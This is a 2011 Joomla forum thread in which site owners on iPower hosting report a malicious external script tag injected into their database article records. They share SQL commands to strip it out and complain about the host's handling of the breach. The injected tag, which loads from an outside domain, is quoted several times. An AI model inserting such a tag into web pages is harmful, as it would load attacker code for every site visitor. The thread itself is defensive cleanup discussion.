The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 22 posts ] 
Author Message
 Post subject: My Site Hacked
PostPosted: Tue May 17, 2011 7:58 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sat Dec 30, 2006 12:35 am
Posts: 42
Joomla 1.0.15 site

A script line of code has been added to every page of our site and I can't figure out how - I would have to guess some type of script was run on the mysql database? - the line added is <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script>

does anyone know how this could have happened, through database or other means and:

How can I remove it from all pages quickly?


Top
 Profile  
 
PostPosted: Wed May 18, 2011 1:47 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
I've no idea where this came from . . . same script.
Any ideas?
If I delete it manually from each article will it reappear?

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 4:26 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I have this problem today too!

Can someone tell me where you find this malicious code please! Thanks/


Top
 Profile  
 
 Post subject: Joomla Version
PostPosted: Wed May 18, 2011 5:18 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
A google search for the offending script yielded this page, however, I ad not notice that in the original post you say you are using an old release of joomla! The current version is 1.5.23

Still though, I am using the current release. Yesterday I tried to set up Search Engine Friendly urls, but was having some trouble, in the process I renamed my htaccess.txt file, I think this may have allowed the script in. I have had trouble with a .htaccess file with this host once before, though not with a Joomla! installation.

I have since uploaded the original file from a backup and tried something simple. In phpMyadmin I exported the database and opened it in a text editor. I then ran a find and replace for the offending code, and removed all instances - the easy way is to hit "replace all" with the "replace with" field blank. I then saved this and imported the updated .msql file into a new database. Problem solved it seems for me, for now.

I am no expert, so I do not know if I have found the root of the problem. If you do attempt any of this, do backups first, so you might retrace your steps should it all go wrong.

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 5:24 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I've found the line of code added to each page in the jos_content and am removing it manually!


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 6:23 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I cleaned out the line of code with the problem from jos content/introtext in every page entry; however, I'm now looking for where to make the same change for the home page as it still hastwo instances of this code!!

Anyone know where I can find this?


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 7:06 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
OK solved it myself! - there were more lines in jos_content I missed the first time. Now it is cleaned out, but why and how is the next questions! How to prevent in future?


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 12:22 am 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Wed Jan 07, 2009 8:17 pm
Posts: 240
Location: New York City
Question: are any of these sites perhaps hosted with IPOWER?

_________________
A clever person solves a problem. A wise person avoids it.


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:14 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Thu May 19, 2011 1:12 am
Posts: 1
I just found this on one of my client's sites...and they are hosted by iPower.


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:32 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Thu May 19, 2011 1:29 am
Posts: 2
Our Joomla site also has this problem and is also hosted by iPower. The site isn't even online at the moment, it is still being designed so I took it offline. I'm going to try removing the script manually and hope for the best. It really hangs the load time which is how I noticed it.


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:32 am 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Wed Jan 07, 2009 8:17 pm
Posts: 240
Location: New York City
That is what I figured.
IPOWER servers have been hacked.
The code is being placed into records in the database.
For Wordpress sites read this forum post:
http://wordpress.org/support/topic/i-did-the-updrage-to-the-latest-version-now-i-have-some-strange-code
For Joomla! sites... well, I working on coming up with a solution that doesn't involve having to edit ever record.

_________________
A clever person solves a problem. A wise person avoids it.


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:47 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
Mine was IPOWER also!

I spoke to them and have an open case that is escalated with them.

The fix is edit your Joomla database with phhpmyadmin jos content/introtext field in every page entry and remove the last line of code that starts with <script> and refers to the problem web site through the </script> and make sure you get them all and it is fixed!


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:59 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Thu May 19, 2011 1:29 am
Posts: 2
I removed all the script lines. Anyone have an idea on how we can prevent this from happening again?


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 2:20 am 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Wed Jan 07, 2009 8:17 pm
Posts: 240
Location: New York City
I agree that the fix can be done through phpmyadmin. But here are the issues:
* I have a client site which has over 500 articles.
* Unless IPOWER is able to discover the cause of the breach, fixes (or patches) the issue, and notifies every user on their servers of the breach, and every user fixes their sites, then there is a very real chance that the script may be placed into the site db records again.

I saw this happen with MediaTemple a couple of years ago and it was a big mess. So far IPOWER has not issued anything or even put up a System Notice in their Support Help Center.

I posted a notification in the message board about the issue along with everything I know so far.
viewtopic.php?f=428&t=621812

_________________
A clever person solves a problem. A wise person avoids it.


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 3:47 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I received a message from IPOWERabout 1 hour ago that they 'removed the maliciouscode...' but no details.
Since I cleaned up myself I don't know what they did or are talking about so I asked them to explain and hopefully will get a reply to explain.
I suspect there was somethingelse planted that did this, but let's pursue IPOWER for answers I know I ceertainly will!


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 7:40 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
My site is also hosted on iPower, this is not the first time I have had a site hacked on their servers, last time it involved the .htaccess as far as I remember, so I presumed this had played a part again. Am I wrong in thinking that this file can alter the content on each page if hacked?

Will also raise it with iPower today.

Slán go fóill.

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 12:08 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sat Dec 30, 2006 12:35 am
Posts: 42
It appears that the script was only added to to the introtext - I ran the following script in phpymyadmin to remove it from the entire site. Sorry I didn't post the day it happened. my site has very strong passwords since my site was hacked a few years ago and the .htaccess file replaced - so I suspect it is on the ipower side that they gained access.

UPDATE jos_content SET introtext = replace(introtext,'<script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script>','')

This page explains how to replace data in a mysql database - might be good to keep on hand for any future needs: http://www.mydigitallife.info/how-to-fi ... using-sql/


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Fri May 20, 2011 12:51 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
To putthe whipped cream and the cherry on the cake IPOWER went into my database after I fixed the problem during the dayand managed to corrupt my jos_content table.

Repeated support calls got very polite, but ineffective responses.

I finally got osmeone to tell me wherethe backup was and was able to extract the content, repair the malicious insert into introtext and reload and my site back up after 24 hours of frustration with total ineptitude ofthe provider iPOWER - shame on them.

I will leave them unless they exlain how the database was harmed by tech support and how this whole episode started inthe first place.

I have many other Joomla sites with other providers and this does not happen there!


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Fri May 20, 2011 7:24 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

( am I to believe they went ahead and gained access where ever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to my like not admitting they haven't a clue . . . )

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Fri May 20, 2011 2:38 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
My experience was that they got into my database and managed to corrupt the jos_content table AFTER I had already cleaned out the junk and told them I was already OK.

I suspect that all the MySql databases are managed as one or possibly groups and can be accessed from the top tier without our permission.

They offer no explanation nor information about what they are doing about this.

I'm preparing to leave them becasue I don't need this as other providers better service and none of these problems.

Every issue I've brought to them has been solved by me because they are unresponsive and unprofessional.

All I can say is they are polite and 'Have a good day!'

3 strikes and they are out!


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Mon Aug 08, 2011 10:34 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Thu Nov 19, 2009 12:11 pm
Posts: 3
Hi
I had the same issue and ipower. I used the command
update `jml_content` set `introtext`=TRIM(TRAILING '<script src="http://infoitpoweringgathering. com/ll.php?kk=11"></script>' FROM `introtext`);

to update them all at once and not miss anything.
does anyone think there is another field or table that was affected?


Top
 Profile  
 
 Post subject: Re: My Site Hacked
PostPosted: Mon Jan 30, 2012 7:04 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sat Jan 28, 2012 8:55 am
Posts: 7
seoirserob wrote:
Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

( am I to believe they went ahead and gained access where ever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to my like not admitting they haven't a clue . . . )


Support rep asking for login credentials is just a false show to make you believe that even then don't have access to your server which in fact is just a myth. Even i have a reseller's hosting account and do provide my customers with hosting accounts and i don't need their login details to access their servers.

So the moral of the story is that besides keeping your scripts update its necessary to choose a reliable host. If you have an important business website always opt for a dedicated hosting server. And last and not the least , avoid buying cheap hosting from forums and other places. My 2 cents.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 22 posts ] 



Who is online

Users browsing this forum: No registered users and 11 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group